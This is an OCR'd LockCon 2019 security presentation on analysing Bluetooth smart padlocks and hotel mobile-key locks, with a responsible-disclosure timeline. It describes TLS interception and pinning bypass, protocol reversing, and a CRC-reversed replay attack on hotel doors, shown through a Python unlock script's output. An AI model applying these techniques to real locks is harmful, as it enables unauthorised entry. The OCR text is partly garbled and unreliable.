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[V1.1 as of 2019-11-05 with some updates that were added after LockCon 2019.] 


Disclaimer: The opinions expressed here are those of the author only; the author is not affiliated with 
the lock manufacturers in any way; the lock manufacturers or the author's employers have nothing to 
do with this presentation. All trademarks are the property of their owners. The information was 
derived only from the analysis of single locks and might be incomplete and / or might contain errors. 
The author gives no warranty and accepts no liability whatsoever concerning this presentation. 
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LOCKCON gs What This Presentation Is About 


e ‘Smart’ devices using Bluetooth Low Energy 
e How to analyze / hack / improve them 
e Vulnerabilities we found that way, from cheap 


padlocks to hotel door systems 


e An update on the X-09 high security lock 
LockCon 2019 - Kasteel de Berckt, Baarlo, NL Chie, 7) 


é 


1 
2 
3 
4 
-) 
6 


. Bluetooth Low Energy (BLE) Ecosystem 
. How to Analyze BLE Systems 

. Previous Vulnerabilities 

. BLE Hotel Keys 

. Responsible Disclosure 

. X-09 Side-channel Attack? 
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The BLE 
Ecosystem 
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LOCKCON ¢¢ BLE Locks 


Components of a “Smart” Lock Ecosystem: 


http / 
BLE https 
Lock sSmartohone Internet 


App 
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LOCKCON gy BLE Locks - Attack Vectors 


Connections: _ machine-in-the- _ impersonation 
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Lock Smartphone Internet 
App 


How to Analyze 
BLE 
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LOCKCON gi Getting the BLE Traffic 


e On your own device, log traffic locally: 


o Android: enable debug mode, 
activate HCI snoop log 


o IOS: install Apple Bluetooth 
Debug Certificate on your device 
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LOCKCON giv? Getting the BLE Traffic 


e Now use the app and interact with 
the device 


e Note timestamps of important 
actions (like “open lock’ ) 


e Get HCI log from phone 


e Analyze using tools like Wireshark 
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Frame 845: 18 bytes on wire (144 bits), 18 bytes captured (144 bits) 


Bluetooth 
Bluetooth HCI H4 
Bluetooth HCI ACL Packet 


Length: 9 
CID: Attribute Protocol (0x0004) 
Bluetooth attribute BER 


errirs 9x0029 (Unkno n: Unknown) 
Value: 55410027dbe8 
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LOCKCON ¢¢ Sniffing BLE 


e For real attacks, sniff BLE over the air 


e 3 advertising channels, need to listen to 
the active one to catch a connection setup 


e USB BLE sniffers ~$25 
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Classic Sniffing Tools 


Vi 


e Adafruit Bluefruit LE Sniffer or Ubertooth One 

e Support Wireshark live view 

e Can monitor only 1 advertising channel 
at a time, follow sequence 

e OK for proof of concept, for 
reliable attacks you need more 
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LOCKCON gi Our Favorite Tool: btlejack 


e btlejack by Damien Cauquil \ 

e Firmware for cheap BLE USB devices: 
BBC Micro:Bit, BLE400, Adafruit Sniffer 

e Use 3 devices and follow all advertising 
channels In parallel 

e Much more than just sniffing: hijacking, ... 
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LOCKCON gi” Ray’s Proof-of-Concept 
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LOCKCON gf" New Tool: Mirage 
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e brings its own (hackable) BLE stack 

— more transparent MITM 
e MITM on one device only (good & bad) 
e Powerful and flexible framework 

— more difficult to use 


e Mirage by Romain Cayre 
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Lock Smartphone Internet 
App 


How to Analyze 
the Backend Link 
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LOCKCON TLS MITM 


e Only few apps use plain HTTP 
e Add fake root CA to intercept TLS/HTTPS 
e MITM tools create certificates on the fly 


e To analyze app, not to break other 
people's TLS 


LockCon 2019 - Kasteel de Berckt, Baarlo, NL Che, iD !: 


é 


LOCKCON gi Using MITM CAs 


e iOS: just declare it as trusted 


e Android: 
o works easily up to 6.x, 
needs rooted device on >=/ 
o or modify app to use user cert store: 
add network security config to 
manifest (then rebuild, sign) 
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i. If the App Uses Certificate Pinning 
CCH 


MANDALAY BAY 


RESORT AND CASINO, LAS VEGAS 


Digital key is not supported at the 
moment, please visit the Front Desk 


moment, please visit the Front Desk 


to pick up your room key. (Code: 


Certificate pinning failure! to pick up your room key. (Code: 


Peer certificate chain: 


sha256/hc5POtL6A7NcihlioLd Certif| cate pl n n ng fa U rel 
xkWJEQYHrJFF70zbZ/7utprg=: 


rx AA eee =| ee eee Se LS ea ee 


Tap to view Room Number 
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LOCKCON gf __|f the App Uses Certificate Pinning 


e Try the other app (iOS vs. Android), 
or an older version Android app 


e Modify the app, rebuild, sign 


e Use Frida / objection FAQIDA 


o Intercept calls in the app, OBTECTION 
RUNTIME 


or inthe OS oes 


a ae EXPLORATION 
— unlimited possibilities :) GIT.IO/0BTECTION 
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LOCKCON i TLS MITM Tools 


e Unix command line: mitmproxy 
e macOs: Charles Proxy 


e Many more available, like Burp Suite or 
Fiddler 
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LOCKCON gi" Example: mitmproxy 


. Sr > 
eG 2e 


2016-12-26 04:33:20 https: //nokeapp.com/ 
text/html 940b /62ms 
Request Response Detail 
text/html: charset=utf-8 
c6d3/795272d60331a34ca3e03922c2/1 
Mon. 26 Dec 2016 04:57:55 GHT 
Google Frontend 
940 
close 
JSON 
{ 
"“lockcount”: 2, 
"locks": L 
1 
“autounlock”: "0", 
“battery’: "196". 
"fobcodesavailable": “2 
"fobcodesrefreshstate’ : 
"foblocklinks”: C1], 
"foblocklinkscount”: "0", 
"lockid": "38850", 
"“Llockkey": “40637020F41C", 
c=help q:back L*-:21984] 
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a Smartphone Internet 


Analyzing the — 
Collected Data 
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LOCKCON if* Example: Nokelock 


e Small, cheap BLE padlock 


e Company offers a large variety of locks 
(also for doors, cabinets, bikes, 
e-scooters...) 


Note: Research as of 2018, the app has been improved in the meantime. 
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Sequence 


> & https://www.gstatic.com 
> © http://android.bugly.qq.com 
> @ hittps://graph.facebook.com 
v @ http://app.nokelock.com:8080 
Vv | newNokelock 
v @ij user 
© updateCid 
i loginByPassword 
© getinfo 
© updateCid 
 checkVersion 
v _ J lock 
0) getLockList 
© getLockList 


Overview Response 
4 


"type": “a , 
"account": "mh@tosl.org", 
"code": u u 


Sequence 


> ®& https://www.gstatic.com 


> © http://android.bugly.qq.com 
> re) https://graph.facebook.com 
v © http://app.nokelock.com:8080 


v (9) newNokelock 

v (J user 
© updateCid 
© loginByPassword 
© getinfo 
© updateCid 
© checkVersion 
Vv lock 
4 getLockList 
getLockList 


Overview Request Summary Chart _—Notes 


"result": [{ 


"name": "mh small", 

"id": 9945, 

"LOCKREY £21532, 095 15,001 05 oes Oop Te rOds doi losloetelisee « 
"isAdmin": @, 
"firmwareVersion": "5.0", 
"type" : @ . 

"barcode": "XBAQ40000645", 
“deviceId": "", 

"LockPwd": "Q00000", 

"mac": "C8:DF:84:2B:9C:2E", 
"account": "mh@tosl.org", 
"gsmVersion": null 


hi, 
"status": "2000" 
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LOCKCON gi 16 bytes “lockKey” 


ON 


istleiti¢-aa =Sequence Overview Request Response Summary Chart Notes 
> @ https://www.gstatic.com { 
> © http://android.bugly.qq.com "result": [{ 
Ie © https://graph.facebook.com il Rta a 
Vv e) http://app.nokelock.com:8080 


v = newNokelock fir | 
a mwareVersion": "5.@", 


updateCid fee "XBA040000645", 16 bytes “lockKey”’ 


{ } loginByPassword os sae eae 1B 20 54 49 3A 05 5E 37 
{J getinfo aS teases on see”. 48 55 35 49 4B O01 4D 45 


updateCid "account": “mh@tosl.org", 
“gsmVersion": null 


— H, — maybe AES-128? 


"status": "2000" 
getLockList } 


f getLockList 
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LOCKCON g%° Traffic Looked Random — Decrypt It 


Decrypt BLE traffic with AES-128 ECB 
— doesn’t look random — W 
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(AOD v= JOCK} 
(lock = app) 
(apps LOCck) 
(lock — app) 


(apo: Lock) 
(LOCK — app) 
(lock — app) 


(tape Ss. Lock) 
(lock = app) 
(lock — app) 
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LOCKCON gif’ Analyzing the Protocol 


Look for patterns 
(Compare several sessions): 


iG HOA dae Gee esrel se SIRS) pores Satoh oy kr Wie lee MOR gone ais eres laa, 
06 02 O07 d4 9c ea ce O01 05 00 00 00 00 00 00 00 (lock = app) 
O2 OO dn dee See oh oreo oe he ies Is voles Kel Ji ep pee oe ie) 
02 02 01 59 9c ea ce O01 05 00 00 00 00 00 00 00 (lock = app) 


OS OU G6) 5 OO 1S ON ar eas eS Milas TFS 116 (Gloom merel.@ 
05 02 O01 00 9c ea ce O1 O05 O00 OO ODO OO ODO OOD OOD (Lock — app) 
05 Od O1 00 9c ea ce O1 05 00 OO OO ODO OD OOD OD (lock = app) 


OS OL "C6750" 30. SON SONS 30d oe ea cee ty alt aati (app y= Lock) 
05 02 O01 00 9c ea ce O1 O05 O00 ODO OO OO OD OO OOD (lock = app) 
05 Od O1 00 9c ea ce O1 05 OO OO OO ODO OD OOD OD (lock = app) 
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LOCKCON gi’ Analyzing the Protocol 


Deduce protocol (from a few sessions): 


AUTH REQUEST COGOLOL) oS wigehalelolinssrets ohh ate 
AUTH RESPONSE (060207), 4 byte session ID, 0 padding 
STALUSSREOQUBST.ClVOZOL0L) a by be-2e o> Lon Ey sae) oe oii) ekereleuiieke: 


(che) ome a olel.@) 
( ) 
( ) 
STATUS RESPONSE (020201), batt state, 3 byte sess.ID, 0 padding (lock = app) 
( ) 
( ) 
( ) 


LOCK. + app 
app St loek 


UNLOCK REQUEST (050106) , passcode, session ID; 28 eee 
UNLOCK ACK (050201), 3 byte session ID, O padding 
UNLOCK CONFIRM (050d01), 3 byte session ID, 0 padding 


appa lock 
LOCK — app 
lock = app 


— Session replay protection: 4 byte session ID created by the lock. 
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Next Steps 


Verify the findings, look for weaknesses. 

BLE protocol 

e Write SW that mimics the app, e.g. Python, bluepy or Adafruit_BluefruitLE 
e Explore the protocol, use fuzzing techniques 

Whole system 

e Maybe an OEM uses the same key for all devices? 


e Maybe the backend leaks other users’ keys? 
(when researching this, consider legal restrictions!) 
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LOCKCON 


Lock Smartphone Internet 


Examples of : 
Previous VULNs 
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LOCKCON ANBOUD Padlock 


e | ypical cheap BLE padlock 


e Shim-proof mechanics, but 
passcode transmitted in plain text 


e To our knowledge still unfixed 
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LOCKCON gi ANBOUD PWNED 


~ Bluetooth Attribute Protocol 
» Opcode: Write Request (0x12) 
» Handle: @x0029 (Unknown: Unknown) 
Value: 55410027dbes8 


e Hex 0x@2706 = Dec 010203 
e That's the code | set on the lock 


e Original app can now be used 
to open lock with sniffed code 
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LOCKCON gi 1Z 14 of 16 locks vulnerable 


e Rose & Ramsey at DefCon 24 (2016) 


e 12 of 16 tested locks had simple BLE 
vulnerabilities 


e Only two of the padlocks remained unbroken 


e One of those we opened with a magnet, 
like its predecessor, ... 
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[In the presentation we had a video showing 

how to turn the internal motor with a strong magnet. 

This PDF does not include the video, 

but you can get an idea from the video that’s linked on the previous slide.] 


0:21,07 


7 
: 


@ZE >a : : — ID) 


LOCKCON gi 1Z 14 of 16 locks vulnerable 


e Rose & Ramsey at DefCon 24 (2016) 


e 12 of 16 tested locks had simple BLE 
vulnerabilities 


e Only two of the padlocks remained unbroken 


e One of those we opened with a magnet, 
like Its predecessor, the other one ... 
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LOCKCON rie NOKE Padlock (!= Nokelock) 


e One of the first BLE padlocks, $652,828 
created on Kickstarter in 2014 


e Note: Research applies to the original 
firmware from 2015-201 / 
(Our responsible disclosure 2016 led to 
a firmware update in 2017) 
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LOCKCON gi NO(KE) Security 


e Uses AES-128 cipher 


e Uses two different secrets for owner 
and other users 


e Time restrictions only enforced in app 
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LOCKCON NOKE AES VULN 


e Secret is transmitted using individual 
AES session keys 


e But session keys are created ina 
“secret handshake’ using a hardcoded 
AES key 


e Security by obscurity 
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LOCKCON NOKE Session Key 


public createSessionkey 
createSessionkey proc near 


edx, byte ptr [esiteax] 


dl, [editeax] 
[ecx+eax], dl 
Pax, [eaxt+1] 
Pax, 4 

short loc 3F/8 


...from binary .so file in APK 
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LOCKCON gi NOKE KEX Broken 


app nonce: b14co8al 
OK 
lock nonce: bff9lae4 


New session key can now be used to decrypt transfer of the 
user's secret 
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Lock Smartphone Internet 
App 


BLE Hotel Keys 
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LOCKCON gif’ Why BLE for Hotels? 


e Main purpose: self-check-in 


e No keycard anymore, mobile phone app Is 
the key 


e Hotels can reduce front desk staff 


e Guests dont have to wait in queue 
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LOCKCON gif Challenges for Vendors 


e Secure pairing not feasible 


e Old hardware in locks, not always 
online 


e Apps often made by 3rd parties, 
lock vendor just provides the SDK 
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LOCKCON ¢if* Mobile Key 


e Booking linked to app account, 
or added by user (Sometimes using 
weak credentials) 


e Online check-in 


e Mobile key is transferred from backend 
to app 
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[Video that shows how 
to use the mobile app 
at a hotel door. 

(The graphics in the 
mobile app was 
modified using 

SSL MITM.)] 


Video 1 


‘<< 


Mobile Key Demo 


sat mesham 


— 
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Hotel “H” 
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LOCKCON gf Encrypted Mobile Key System 


e The vendor has a secret key K,, known to the lock 


e Backend to App: key K and encrypted key 
* = enc,.(K) 


App to Lock: K* 
Lock uses K, to decrypt K* to K 


e Key K now known to App and lock, but not to an 
eavesdropper; K, still unknown to App 


e Further BLE traffic is AES-encrypted with Key K 
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LOCKCON gif Encrypted Mobile Key System 


e Didnt find obvious attack vector, 
except for extracting K, from the physical lock!"], 
which we haven't tried :) 

e No further experiments, because on the second stay, 
the mobile key system was deactivated. 


[l cf. Thomas, Blackhat USA 2014: Reverse-Engineering the Supra iBox 
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Manufacturer ““M” 
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LOCKCON ¢¢° Vulnerable System 


e Found system early 2019 in an upper 
class hotel 


e Mobile key used in elevator, rooms and 
fitness center 


e Analyzed TLS and BLE traffic 
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LOCKCON gf" Key from Backend 


8019-07-25 03:23:08 GET https://app f‘api/vl/devices/mobile key/8f 
dcc/5e-a290- 4633 -9Tb8-865c9472ba63 
- 200 OK application/json 702b 140ms 

Request Response Detail 

-Request-Id: 48dd45a5 -7610-4ba3 -a684- £5853 f5696dd 

-Runtime: 0.047805 

trict-Transport-Security: max-age=31536000; includeSubDomains 

SON [m: Auto] 


“device token": "m= 


"exp date": "2019-07-25 00:00:00.000", 


“key type": , 
“mobile key": { 
"da": "2019-07-25T14:00+00:00", 
rae a ek 
140, 
2, 
253, 
1, 
254, 
248, 


?:help q:back [*:21984] 
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Data seen in HCI log (BLE) 


"dt": | » Bluetooth HCI ACL Packet 
—mebu.ien > Bluetooth L2CAP Protocol 
‘euewa~ Bluetooth Attribute Protocol 
» Opcode: Write Request (0x12) 
>» Handle: O@x@00e (Unknown: Unknown) 
Value: 
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LOCKCON 


Full BLE Trace 


Lock: 
Lock: 
App: 
Lock: 
App: 
App: 
Apo: 
App: 
hock: 
lock 


0000 
000103001lec05d6bb5190707051b2b19e0 
00010200001200010101010101bbec98 £3 
0001040104d612ffeafad012 
3000000000000044ca8c02Ed01Fef8£df9 
31605803e9196317£b5b9e8cb6e616b7baé6 
32ca06cfbc48c67697£0c34897948cC218c 
33cf3£2a462F78d9c887 4b6bb021b70034 
0002190707051b00090ca50000000l1af08 
J002 


Note: The description was slightly modified to protect the innocent not yet patched devices. 


= Key 
(all bytes from 
backend) 
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LOCKCON ¢° Further Analysis 


hock: OO00 


lock? 000103001lecOSd6bb5190707051b2b19e0 = Lock MAC,CRC 

App: 00010200001200010101010101lbbec98f3 = App Nonce, CRC 

Lock: O001040104dol2ffeafad0l2 = Lock Nonce, CRC 

App: 3000000000000044ca8c02Ed0I1fef8£L£dE9 = Special CRC, Key 

App: 31605803e9196317£fb5b9e8cb6e616b7bab6 (all bytes from 

App: 32ca06c£bc48c67697£0c34897948c218¢c backend) 

App: 33c£3£2a462£78d9c887 4b6bb021b70034 

ite red «. 0002190707051b00090ca500000001af08 = Lock confirmation: open 


rock: 0002 


Note: The description was slightly modified to protect the innocent not yet patched devices. LockCon 2019 - Kasteel de Berckt, Baarlo, NL Che, : y: 


LOCKCON gis CRC Reversing 


e Tools for CRC reversing are available, e.g. CRC RevEng 


e We just used a custom Python script and searched for 
CRC-16 parameters that matched in at least 2 messages, 
assuming the CRC is located at the end of a message 


Trying different polynomials and start values... 
Trying polynomial UxXZT1S.,4. 
ieee 
Tevying. polynomial 0 x os 
Match found: Polynomial: — Seed: 0x73 Final XOR: Oxffff 
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LOCKCON ¢ f° CRC Reversing 


e Seed for CRC of first msg turned out to be a value 
received from the backend (“sc’ / constant within hotel) 


e Seed for CRC of next msg is CRC of previous msg 


e But for the most important part, the credential packet, 
the CRC calculation was more complicated: 


00 00 00 00 00 00 Oc 3b 8c 02 fd O01 fe Ye £2 3b 


& teed 2 bytes 5 bytes 3 bytes 
Y changing each constant per constant per 
always zero : 
session hotel stay 


Note: The description was slightly modified to protect the innocent not yet patched devices. LockCon 2019 - Kasteel de Berckt, Baarlo, NL "Ch yy) 


e So we had 1 block with the CRC obviously not at the end, 
some constant blocks, 6 zero bytes, > 
and 16 changing bits 


e And 3 CRC-16 values and 2 session 
nonces to play with... 


e [... some playing around ...] 


Note: The description was slightly modified to protect the innocent not yet patched devices. LockCon 2019 - Kasteel de Berckt, Baarlo, NL Che, Vi i 


LOCKCON gis CRC Reversing 


This intermediary byte sequence (and seed CRC3) 
84 3c, 45 £2, 88 40, 34 fl, 8c 02 fd 01 fe Ye F2 3b 


J aed 


noncel CRC i nonce2 CRC2 


yields the final CRC-16 value 0c3b. 


— Now we know how to create the credential packet: 
00 00 00 00 00 00 Oc 3b 8c 02 fd 01 fe Ye £2 3b 


FS ——~ 


OVeErWwritlien CRC 
with zeroes inserted here 


Note: The description was slightly modified to protect the innocent not yet patched devices. LockCon 2019 - Kasteel de Berckt, Baarlo, NL Che, ‘ i 
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LOCKCON if" Preparing an Attack 


e Created a Python script 


o Input: Device name, credential bytes 
(as sniffed from previous opening) 


o Calculates CRCs, handles BLE 
communication (using bluepy) 
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[Video that shows 
how BLE data is 
sniffed off the air.] 


Video 2 
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LOCKCON gi Executing the Script 
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[root@zawa mmk-unlock-master]# python mmk-unlock.py AHPKUJZL |30000000000000381a8c02fd0lfef 
b5b9e8cbeb61l6b/bab 32ca06cfbc48c6/69/F0c34897948c218c 33cf3f2a462F/8d9c88/4b6bb021b/0034 
Derived from device name AHPKUJzL: SC == 115, Room Number == 3237 
Extracted mobile key: 8c02fd01fef8fdf9605803e9196317fb5b9e8cb6e616b/babca06cfbc48c6/697f0c3 
8d9c88/4b6bb021b/0034 

[*] scanning (3s)... 

[-] Room 3236, SC 115, Additional Data 0, 156 (00:1le:cQ:5d:/72:94, AHPKQJzb), RSSI=-88 

[-] Room 3237, SC 115, Additional Data 0, 156 (00:le:cQ:5d:6b:b5, AHPKUJzL), RSSI=-83 

[-] Room 3137, SC 115, Additional Data 0, 155 (00:le:cQ:5d:/73:e8, AHPEEJuC), RSSI=-94 

[-] Room 3337, SC 115, Additional Data 0, 15/7 (00:le:c0:4f:32:f3, AHPQkJ0Q), RSSI=-97 
unlocking in progress... 
[1] Connecting... 
Initializing BLE peripheral class... 
Setting the delegate... 
MyDelegate registered 
Discovering the BLE service... 
Discovering the write characteristic... 
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[Video that shows 
how Ray opens the 
hotel room door 
with sniffed data. 
(He opened doors 
only with permission 
of an authorized 
user, no actual 
Breaking In 
happened!)] 


Video 3 
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LOCKCON ¢if* some more Scripting 


e Created test target (also Python script) 
o simulates a lock 


o handles BLE communication in the 
peripheral role (using pybleno) 


e Now we could play with this at home :) 
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LOCKCON gi How Big Is the Problem? 


e Found more hotel chains using the product 


e BLE names are easy to check on-site, 
without actual room booking 


e After booking a room, we found an even 
simpler variation of the protocol deployed 
(the “final / special” CRC part is left out) 
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Responsible 
Disclosure 
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LOCKCON i Disclosure Timeline 


e 2019-04-18: First vendor notification, immediate response 
e 2019-04-26: Technical details to vendor 

e 2019-05-02: Vendor questions feasibility 

e 2019-05-06: Proof of concept code sent 

e 2019-05-29: Vendor acknowledges vulnerability 

e 2019-06-28: Vendor discusses update plans 
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LOCKCON gi Update Plans and Challenges 


e Locks in ‘our’ first hotel are online, can be updated 
remotely 


e Others need someone going from door to door with an 
update device 


e Multiple app vendors have to integrate the new SDK 


e Lesson learned: Identify all affected parties early 
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The KABA MAS X-09™ 
High Security Safe Lock. 


\ Hands-On Presentation at LockCon 2008. 


he Netherlands, 10 Oct 2008, Michael U. Huebler. 
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LOCKCON gif DEF CON 27 had a surprise... 


Business Markets World Politics TV More 


TECHNOLOGY NEWS AUGUST 6, 2019 / 9:58 PM / 3 MONTHS AGO 


Exclusive: High-security locks for 
government and banks hacked by 
researcher 


Joseph Menn 4 MIN READ yw f 


SAN FRANCISCO (Reuters) - Hackers could crack open high-security 
electronic locks by monitoring their power, allowing thieves to steal cash in 
automated teller machines, narcotics in pharmacies and government 
secrets, according to research to be presented Friday at the annual Def Con 
hacking conference in Las Vegas. 
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lOActive. 


Hardware |Software |Wetware 


SECURITY SERVICES 
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LockCon 2008 


Komen 10e@ electronic card 


Michael U. Huebler 
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LOCKCON ra Easy to reproduce 
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LOCKCON eo However, the secret combination is not transmitted 


in “plain text’, but obfuscated 


R/W Addr Value R/W Addr Value R/W Addr Value R/W Addr Value 


Read Ox00 Ox55 Read Ox0A Ox0OO 
Read Ox01l OxAA Read Ox0OE 0x00 
Read Ox8A 0x00 
Read Ox8B 0x00 
Read 0x07 0x00 


(long pause while 
Read Ox81 0x58 the combination 

Read 0x82 0x99 is dialed) 
Read 0x83 0x53 


0x00 
O20 


Read 
Read OxFD 0x58 Read 
Read OxXFE 0x99 


Read OxXFF 0x53 


Read Ox0F 
Read Ox10 0x84 Read Ox20 QOx6l Read Ox30 Ox81 


Write O0x0C 0x00 Revell | (bec 1b IL 


(Serial number of the X-09: 589953 — Combination: 12 3456) ae. sna kactoot do Borckt Baarlo. NI Cs, a. 


Thanks for your attention! 


Questions? 


Contact: mh@tosl.org 


LOCKCON gi Some Useful Links 


BLE exploration tool for your smartphone: 
https://apps.apple.com/app/lightblue-explorer/id557428110 / 
https://play.google.com/store/apps/details ?id=com.punchthrough.lightblueexplorer 


Modifying Android app manifest to make app trust user CAs 
https://medium.com/@elye.project/android-nougat-charlesing-ssl-network-efa0951e66de 


Rebuild/Sign APK 
https://gist.github.com/AwsafAlam/f53312cbb912cf3e4267a5971cd75db0 


JADX decompiler: 
https://github.com/skylot/jadx (Also can simply be done online: https://www.google.com/search?&q=online+jadx) 


If you are interested in locks and lock picking: 
https://toool.nl/Publications 
http://lockpicking.org (German) 
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